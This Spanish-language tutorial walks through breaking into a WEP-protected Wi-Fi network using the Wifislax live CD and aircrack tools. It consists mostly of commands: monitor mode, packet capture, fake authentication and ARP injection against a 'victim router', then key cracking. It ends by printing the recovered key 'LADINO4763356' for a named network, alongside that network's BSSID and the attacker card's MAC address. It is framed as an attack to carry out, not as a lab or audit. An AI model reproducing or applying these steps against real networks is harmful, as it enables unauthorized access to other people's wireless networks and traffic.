1.Descargar el cd de wifislax 3.1 desde http://download.wifislax.com:8080/wifislax-3.1.iso. Boot el equipo por cd. En el momento que ya haya terminado de cargar el OS, para cargar el escritorio grafico, colocar como login "root" y password "toor", y finalmente "startx". Seguidamente se debe configurar la interfaz de red como monitor sobre el canal en el que se encuentre el ESSID.
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.
3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision
#iwconfig wifi0 rate 1M
4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier archivo.
NOTA: tambien se puede hacer de la siguiente manera:
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6
5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.
Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:
….
Equivalente en ASCII: LADINO4763356